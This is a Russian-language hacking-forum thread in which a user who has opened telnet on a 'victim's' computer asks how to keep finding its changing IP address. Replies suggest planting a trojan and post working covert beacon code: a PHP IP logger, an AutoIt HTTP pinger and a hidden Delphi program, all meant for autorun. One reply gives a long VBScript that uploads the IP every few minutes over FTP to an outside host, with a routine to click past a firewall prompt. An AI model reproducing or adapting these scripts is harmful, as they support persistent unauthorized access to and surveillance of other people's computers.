Как узнавать IP жертвы с динамичным адресом.

Discussion in 'Песочница' started by SKIF86, 18 Sep 2009.

  1. SKIF86

    SKIF86 New Member

    Joined:
    18 Jul 2009
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    Ситуация: Открыл телнет у компа жертвы. Первый раз зашел на комп, все окей. Но после того как жертва перезагружает тачку меняется IP. Как теперь попасть на комп? Панимаю можно паслать через сетевой снифер. Но постоянно кидать ее на снифер не вариант. Я так думаю... Как разобраться с такой проблемой? Те как всегда знать ее IP?
     
  2. Keltos

    Keltos Banned

    Joined:
    8 Jul 2009
    Messages:
    1,558
    Likes Received:
    920
    Reputations:
    520
    Те как всегда знать ее IP?
    Постоянно коннектится к ней
     
  3. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Вбить в крон инет-качалку со ссылкой на снифер, который запишет айпи в лог. Либо написать маленькую прогу, которая будет делать тоже самое.
     
  4. SKIF86

    SKIF86 New Member

    Joined:
    18 Jul 2009
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    Перечитай мой пост...
     
  5. SKIF86

    SKIF86 New Member

    Joined:
    18 Jul 2009
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    А можно поподробнее и если незатруднит пример...
     
  6. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    троя ему залей, и пусть он те логи шлет когда скажешь.
    или подключи ему dyndns ))и ему приятно и тебе полезно))))
     
  7. SKIF86

    SKIF86 New Member

    Joined:
    18 Jul 2009
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    какого троя то?
     
  8. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    Кури в сторону hamachi (как только он будет в сети он будет у тя в онлайне )
     
    _________________________
  9. SKIF86

    SKIF86 New Member

    Joined:
    18 Jul 2009
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    блин..... нарыл програмулинку, вроде пахала и ее непалил антивирус.... сегодня начал соберарать все во едино и антивирус палит прогу...
    ipbot.exe
     
    #9 SKIF86, 19 Sep 2009
    Last edited: 20 Sep 2009
  10. Nik(rus)

    Nik(rus) Member

    Joined:
    19 Jun 2009
    Messages:
    45
    Likes Received:
    7
    Reputations:
    0
    Если у тебя есть хост, то:
    Заливаешь туда скрипт пыховский:
    <?php
    file = fopen("log.txt","w");
    fwrite(file,$_SERVER['REMOTE_ADDR']);
    fclose(file);
    ?>
    На вражеском компе в авторан мини скрипт, запрашивающий эту страничку
    Смотрим log.txt и там ву-а-ля: IP жертвы :)
     
  11. francesko

    francesko New Member

    Joined:
    9 Nov 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    "мини скрипт" можно поподробней... И желательно так чтоб каждый час например запрашивал
     
  12. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    Лучше всего конечно ASM + Winsock, но можно вполне и на делфи написать. В общем пишешь через indy (компонент IdHTTP) программу, которая будет посылать GET запрос на указанный хост, который в свою очередь содержит скрипт, записывающий в логи айпи. Ну и сделай это все в таймере. Интервал поставь какой надо. И пропиши программу в автозагрузку. Вот собственно и весь метод.
     
  13. Nik(rus)

    Nik(rus) Member

    Joined:
    19 Jun 2009
    Messages:
    45
    Likes Received:
    7
    Reputations:
    0
    AutoIt код:
    Code:
    #include <HTTP.au3>
    $host = "www.php.jim"
    $page = "/some.php"
    $http = _HTTPConnect($host)
    _HTTPGet($host,$page,$http)
    HTTP.au3

    Компилиш и вот тебе беспалевный ехешник,как в авторан запихать расказывать не буду, думаю тебе мои способы покажутся палевными :) (я ядро винды не лапаю Oo)
     
    1 person likes this.
  14. cheater_man

    cheater_man Member

    Joined:
    13 Nov 2009
    Messages:
    651
    Likes Received:
    44
    Reputations:
    7
    vb script если нужно под себя подделаешь ;)
    Code:
    On Error Resume Next
    newfolderpath = "C:\WEB" 'Папка где находится скрипт
    login="фтп-логин"
    password="фтп-пасс"
    ftpp="ftp.narod.ru"
    '=================================================  ===
    ' Узнаем текущий IP и пишем его в файл
    '=================================================  ===
    set objLocator = WScript.CreateObject("WbemScripting.SWbemLocator")
        set objService = objLocator.ConnectServer (server, "", username, password)
        strQuery = "Select IPAddress from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE"
        set objEnumerator = objService.ExecQuery(strQuery)
        for each obj in objEnumerator
            if Not IsNull(obj.IPAddress) then 
                for i=LBound(obj.IPAddress) to UBound(obj.IPAddress)
                    GetIPaddress = obj.IPAddress(i)
    'Узнаем текущий (реальный) наш IP
    Str = GetIPaddress
               next
            end if
    next
    FileDestination = "ip.txt"
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set Destination = FSO.CreateTextFile(FileDestination)
    Destination.WriteLine Str
    set Destination = Nothing
    Set FSO = Nothing
    set objLocator = Nothing
    '=================================================  ==================================================  ============
    'Отправляем на фтп текущий IP
    'Отсылаем на ФТП на narod.ru
    'Создаем файл сценария для FTP.EXE 
    set FSO = CreateObject("Scripting.FileSystemObject") 
    Set WSHshell = WScript.CreateObject("WScript.Shell") 
    Set sDir = WSHshell.Environment("Process")    ' - находим путь к папке Windows 
    Set cScript = fso.CreateTextFile (sDir("windir") & "\FTp.scr")  '-Обозначаем место, где будет создан и сохранен файл сценария (в данном случае - папочка виндовз) 
    cScript.WriteLine "Open " & ftpp & "" '- Открываем соединение с сайтом ftp.narod.ru на 21 порту 
    cScript.WriteLine "" & login & "" '- Имя пользователя 
    cScript.WriteLine "" & password & "" '- Пароль 
    cScript.WriteLine "drive C:" '- Выбраем диск С
    cScript.WriteLine "lcd " & newfolderpath ' - Устанавливаем папку, откуда будем отсылать данные
    cScript.WriteLine "prompt" ' - Отключаем всякий диалог по каждому файлу
    cScript.WriteLine "binary" ' - метод передачи файлов по FTP
    cScript.WriteLine "PUT ip.txt"'- Отправляем IP
    cScript.WriteLine "bye" '-разрываем соединение с ftp.narod.ru 
    cScript.Close '- Конец записи в файл сценария 
    ' Запускаем FTP-сценарий 
    WSHshell.Run sDir("windir") & "\system32" & "\FTP.ExE -s:" & sDir("windir") & "\FTp.scr", 0
    ' Обходим фаер (в данном случае Outpost, если надо, раскоментируйте с помощью символа " ' " все строчки, что ниже, до '---------------------------)
    'set w=CreateObject("WScript.Shell")
    'a=0
    'do
    'r=W.AppActivate("ftp.exe")
    'if r then
    'a=1
    'w.SendKeys "{tab 2}"
    'w.SendKeys "{enter}"
    'end if
    'loop until a=1
    'set w=Nothing
    '---------------------------
    Set fso = Nothing 
    Set WSHshell  = Nothing 
    '=================================================  ===
    'А теперь запускаем цикл проверки на изменение IP
    '=================================================  ===
    Const ForReading = 1
    Str=1
    s=2
    if Str<>s then
    While 1
    WScript.Sleep 10000 ' Сканим на изменение IP раз в 15 минут
        set objLocator = WScript.CreateObject("WbemScripting.SWbemLocator")
        set objService = objLocator.ConnectServer (server, "", username, password)
        strQuery = "Select IPAddress from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE"
        set objEnumerator = objService.ExecQuery(strQuery)
        for each obj in objEnumerator
            if Not IsNull(obj.IPAddress) then 
                for i=LBound(obj.IPAddress) to UBound(obj.IPAddress)
                    GetIPaddress = obj.IPAddress(i)
    'Узнаем текущий (реальный) наш IP
    Str = GetIPaddress
               next
            end if
    next
    Set FSO = Nothing
    set objLocator = Nothing
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set ts = FSO.OpenTextFile("ip.txt", ForReading) 
       s = ts.ReadLine 
       ts.Close
    Set FSO = Nothing
    Set ts = Nothing
    if Str<>s then
    FileDestination = "ip.txt"
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set Destination = FSO.CreateTextFile(FileDestination)
    Destination.WriteLine Str
    set Destination = Nothing
    Set FSO = Nothing
    '=================================================  ==================================================  ============
    'Отправляем на фтп новый IP (уже в цикле, каждые 15 минут, в случае, если IP изменился)
    'Отсылаем на ФТП на narod.ru
    'Создаем файл сценария для FTP.EXE 
    set FSO = CreateObject("Scripting.FileSystemObject") 
    Set WSHshell = WScript.CreateObject("WScript.Shell") 
    Set sDir = WSHshell.Environment("Process")    ' - находим путь к папке Windows 
    Set cScript = fso.CreateTextFile (sDir("windir") & "\FTp.scr")  '-Обозначаем место, где будет создан и сохранен файл сценария (в данном случае - папочка виндовз) 
    cScript.WriteLine "Open " & ftpp & "" '- Открываем соединение с сайтом ftp.narod.ru на 21 порту 
    cScript.WriteLine "" & login & "" '- Имя пользователя 
    cScript.WriteLine "" & password & "" '- Пароль 
    cScript.WriteLine "drive C:" '- Выбраем диск С
    cScript.WriteLine "lcd " & newfolderpath ' - Устанавливаем папку, откуда будем отсылать данные
    cScript.WriteLine "prompt" ' - Отключаем всякий диалог по каждому файлу
    cScript.WriteLine "binary" ' - метод передачи файлов по FTP
    cScript.WriteLine "PUT ip.txt"'- Отправляем куки от IE
    cScript.WriteLine "bye" '-разрываем соединение с ftp.narod.ru 
    cScript.Close '- Конец записи в файл сценария 
    ' Запускаем FTP-сценарий 
    WSHshell.Run sDir("windir") & "\system32" & "\FTP.ExE -s:" & sDir("windir") & "\FTp.scr", 0
    ' Обходим фаер (в данном случае Outpost, если надо, раскоментируйте с помощью символа " ' " все строчки, что ниже, до '---------------------------)
    'set w=CreateObject("WScript.Shell")
    'a=0
    'do
    'r=W.AppActivate("ftp.exe")
    'if r then
    'a=1
    'w.SendKeys "{tab 2}"
    'w.SendKeys "{enter}"
    'end if
    'loop until a=1
    'set w=Nothing
    '---------------------------
    Set fso = Nothing 
    Set WSHshell  = Nothing 
    end if
    Wend
    end if
    этот скрипт меня не раз выручал ;) Ну в общем дерзай :)
     
    #14 cheater_man, 16 Nov 2009
    Last edited: 16 Nov 2009
  15. francesko

    francesko New Member

    Joined:
    9 Nov 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Не работает у меня приходит левый IP
     
  16. cheater_man

    cheater_man Member

    Joined:
    13 Nov 2009
    Messages:
    651
    Likes Received:
    44
    Reputations:
    7
    Ты хотябы со скриптом разобрался ? Как видишь этот скрипт выполняет следующие ф-ции:
    1. распознает ВНУТРЕСЕТЕВОЙ ip
    2. сохраняет его в txt
    3. отправляет его тебе на ftp
    ...
    Ну в общем не чего сложного!
    Тебе нужен внутресетевой или внешний ip?
     
    #16 cheater_man, 16 Nov 2009
    Last edited: 16 Nov 2009
  17. francesko

    francesko New Member

    Joined:
    9 Nov 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Хм... да ты прав А как его переделать под внешний ip?
     
  18. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    Вот код на делфи. Передает айпи на скрипт ip.php, который принимает его и записывает в файл ip.txt. Кидаем на форму три компонента - таймер, IdHTTP (Indy Clients) и IdIpWatch (Indy Misc).

    Выставляем интервал таймера. Он отвечает за скорость передачи на скрипт айпи. 1000 = 1 сек.

    Затем клацаем Project - View Source, и там дописываем одну строчку - Application.ShowMainForm:=False;

    Должно получиться вот так:

    Это сделает твою программу скрытой.

    Вот php скрипт, который принимает IP:

    PHP:
    <?php
    $file 
    fopen("ip.txt","a");
    fwrite($file$_GET['ip']);
    fwrite($file"\r\n");
    fclose($file);
    ?>
    Все айпи будут записанные в ip.txt
     
    #18 Sams, 17 Nov 2009
    Last edited: 21 Nov 2009
  19. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    Nik(rus), а иконка AutoIt в трее совсем не палевная, да? :)
     
  20. cheater_man

    cheater_man Member

    Joined:
    13 Nov 2009
    Messages:
    651
    Likes Received:
    44
    Reputations:
    7
    Обычно все хацкеры стараются получить внутренний ip ;) Зачем тебе внешний?